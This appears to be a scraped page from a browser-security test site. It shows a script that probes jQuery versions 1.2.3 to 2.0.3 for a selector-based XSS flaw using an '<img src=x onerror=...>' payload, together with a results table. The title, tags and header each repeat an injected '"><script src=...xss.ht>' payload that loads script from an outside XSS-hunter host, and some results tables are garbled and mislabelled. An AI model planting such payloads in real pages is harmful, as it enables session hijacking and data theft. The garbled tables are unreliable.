"><script src=https://xs90.xss.ht></script>

"><script src=https://xs90.xss.ht></script>

By
AbdeOuabala 0 Seen 319 times
Tags
"><script src=https://xs90.xss.ht></script>
Run this test now.

Results


Tested on
Firefox - 79 - Windows 10
jQuery VersionIs it Vulnerable?
jQuery 2.0.3Safe
jQuery 1.10.2Safe
jQuery 2.0.1Safe
jQuery 1.10.0Safe
jQuery 1.9.0Safe
jQuery 2.0.2Safe
jQuery 1.9.1Safe
jQuery 1.10.1Safe
jQuery 1.8.1Vulnerable
jQuery 1.8.0Vulnerable
jQuery 1.8.3Vulnerable
jQuery 1.8.2Vulnerable
jQuery 2.0.0Safe
jQuery 1.7.1Vulnerable
jQuery 1.6.4Vulnerable
jQuery 1.7.0Vulnerable
jQuery 1.6.2Vulnerable
jQuery 1.7.2Vulnerable
jQuery 1.6.3Vulnerable
jQuery 1.6.1Vulnerable
jQuery 1.5.1Safe
jQuery 1.5.2Vulnerable
jQuery 1.6.0Vulnerable
jQuery 1.4.4Vulnerable
jQuery 1.2.6Vulnerable
jQuery 1.4.0Vulnerable
jQuery 1.4.1Vulnerable
jQuery 1.4.2Vulnerable
jQuery 1.4.3Vulnerable
jQuery 1.5.0Vulnerable
jQuery 1.3.0Vulnerable
jQuery 1.3.1Vulnerable
jQuery 1.3.2Vulnerable
jQuery 1.2.3Vulnerable

This browser ran the most recent scan
Tested on
Chrome - 92 - undefined
jQuery VersionIs it Vulnerable?
GETSome Error Occured
POSTSome Error Occured
HEADSome Error Occured
PUTSome Error Occured
OPTIONSSome Error Occured
TRACKSome Error Occured
CONNECTSome Error Occured
TRACESome Error Occured
CUSTOMSome Error Occured
DELETESome Error Occured

This browser ran the most recent scan
Tested on
Chrome Mobile - 90 - Android
jQuery VersionIs it Vulnerable?
protocolSome Error Occured
pathnameSome Error Occured
searchSome Error Occured
originSome Error Occured
hrefSome Error Occured
hostnameSome Error Occured
portSome Error Occured
ancestorOriginsSome Error Occured
valueOfSome Error Occured
hostSome Error Occured
reloadSome Error Occured
toStringSome Error Occured
assignSome Error Occured
hashSome Error Occured
replaceSome Error Occured

User Script (ENUM_FUNCTION)

					
// Custom Functions
var jQuery_version = '';
function vulnerable(){
    addError('jQuery '+ jQuery_version, '<b>Vulnerable</b>');
}

function safe(){
    addSuccess('jQuery '+ jQuery_version, 'Safe');
}
    
function removeIframe(){
    var x = document.getElementById('jQueryFrameID');
    x.parentNode.removeChild(x);
}

// Test Function
function test(data){
	// We need to separate properties and access one by one.
try{
    jQuery_version = data;
    var jQueryFrame = document.createElement('iframe');
    jQueryFrame.id = 'jQueryFrameID';
    jQueryFrame.onload = function(){
            var jQueryScript = jQueryFrame.contentWindow.document.createElement('script');
            jQueryScript.type = 'text/javascript';
            jQueryScript.src = 'https://ajax.googleapis.com/ajax/libs/jquery/'+ data.toString() +'/jquery.js';
            jQueryFrame.contentWindow.document.body.appendChild(jQueryScript);
            jQueryScript.onload = function(){
                var exploitScript = "try{function bad(){parent.vulnerable(); parent.removeIframe();} $('. <img src=x onerror=bad();>');} catch(err){parent.safe();parent.removeIframe();}";
                var exploit = jQueryFrame.contentWindow.document.createElement('script');
                exploit.type = 'text/javascript';
                exploit.innerHTML = exploitScript;
                jQueryFrame.contentWindow.document.body.appendChild(exploit);
                
            };
            jQueryScript.onerror = function(){
                addResult(data ,  'Some Error Occured');
            }
    };
    document.body.appendChild(jQueryFrame);

}

catch(err){
	addInfo(data ,  'Some Error Occured');
}

}
					
				
					
				

Enum Data (ENUM_FUNCTION)

					
// Taken from jQuery Versions Under, https://developers.google.com/speed/libraries/devguide#jquery
var data = ['2.0.3', '2.0.2', '2.0.1', '2.0.0', '1.10.2', '1.10.1', 
'1.10.0', '1.9.1', '1.9.0', '1.8.3', '1.8.2', '1.8.1', '1.8.0', 
'1.7.2', '1.7.1', '1.7.0', '1.6.4', '1.6.3', '1.6.2', '1.6.1', 
'1.6.0', '1.5.2', '1.5.1', '1.5.0', '1.4.4', '1.4.3', '1.4.2', 
'1.4.1', '1.4.0', '1.3.2', '1.3.1', '1.3.0', '1.2.6', '1.2.3'];